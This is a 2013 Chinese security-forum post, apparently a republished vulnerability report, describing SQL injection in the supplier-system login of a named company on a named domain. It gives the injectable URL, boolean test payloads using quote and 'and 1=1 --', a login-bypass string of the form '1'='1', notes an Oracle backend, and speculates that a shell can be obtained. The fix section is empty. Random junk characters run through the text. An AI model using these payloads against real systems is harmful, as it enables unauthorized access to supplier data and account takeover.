找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2606|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。
, l2 Q" U2 G  W* ~; }详细说明:1 W0 Y0 s' {  D& g2 d* l6 ?. l, v  a
万达scm系统登陆框sql注入。# d# p0 g" m7 L9 u; M
( R9 Y% h: K5 ~! K0 {6 F% Q; p7 {
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27# _% C3 O- m1 d% G

; h# `$ H7 \# v; G( ~# Q
# w  l+ r$ @5 Z% R) P- M500错误。
2 n0 V+ F) H$ j! Q+ c
9 n8 l8 ~; S; t5 s/ \: A用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
1 F. y7 W# p, f: h- jhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
5 Z2 X) {- u3 j1 v* u0 w3 y" u截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。): |. N2 j  ?- L9 C5 t" B
经过分析,登陆验证的过程应该是:' X' e- m# ]; A: N; e+ V4 Q4 X

3 m$ O3 d7 X" M  A+ B5 Q5 @取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。, \; N. l2 Y0 S7 [* H5 C
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png* g/ X3 K! i/ m$ C0 W4 d: Q8 Z
8 V7 |' V& l0 m3 j' L
oracle数据库,存在注入点。@大连万达,你怎么看?
: E2 z5 t+ x# T* d& R6 Ehttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png. ~3 k1 @0 c$ \- l. P

& {! u5 Y, @2 S8 n9 C系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。
. I- h. w/ o, r' j( H漏洞证明:
/ Q( z' V. i$ m" P) _万达scm系统登陆框sql注入。
2 R) e% m% ^- J% V5 ]
4 h% J: s+ x1 @9 J' Y7 lhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%275 q* k& ]' t0 u% V% ~5 J
; t5 T3 {* D/ w! H6 X

) B2 o# e8 p) i- e3 x500错误。
+ A1 m/ Y* k# A! Q5 R! ^( g( E; G. O( J4 Z  e1 b) S
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
6 U. c+ H% }. T9 zhttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png9 K8 D6 Z3 _  L* r1 k

8 }, E. U3 u$ s6 ]: n* A: U) f* l
1 M& T+ x# `3 Q) j8 l2 n0 C2 o(截图有一点问题)
* r7 ^* ~; d) ]  `: f4 @  _/ G9 y4 ~; o* _# D  j) A$ V* Z$ n
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
+ ^8 ?: G& ?- Z) R2 ?/ N4 s- J0 H0 g  V
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
5 ?' ~% v0 \/ P8 ~  p  t
7 W3 e6 B5 J( x( l/ l0 n, ~绕过:
  x0 f8 {7 O, v" n3 b7 z( |http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1$ q) Y9 L+ ^# y  x" ^1 G) @$ p9 j! E. d; k

5 N  x9 L3 I+ y" R. c3 i( \" S: x' s( ^5 f6 ?' k" j, G$ S" A  w
oracle数据库,存在注入点。@大连万达,你怎么看?0 Z6 f: D1 l  q+ k" |8 d. G% F, s
​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。" v. k' U$ o  i: b6 l

0 h3 I2 \. i. R8 e& k* v& u修复方案:
$ Y4 c  j+ ~6 i# m) U7 s。。。) A. N. A# W6 G% S1 N  l

8 ?( g) U2 x8 I; O, K+ R9 V0 @
6 w6 R5 z3 N* b0 M; f4 C! k/ Q厂商已经确认8 i2 {) u5 f; l% n( p# W9 G. a& |

! t6 r+ N7 |) P1 V5 u2 w+ Y1 N[/td][/tr]
& y6 h2 g0 ^" h8 q- |8 o[/table]% T6 G$ V6 B1 `$ P
) K) K6 C, B3 k) W( e* h

  Y9 B$ c/ \( C) |8 R2 w# w/ v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表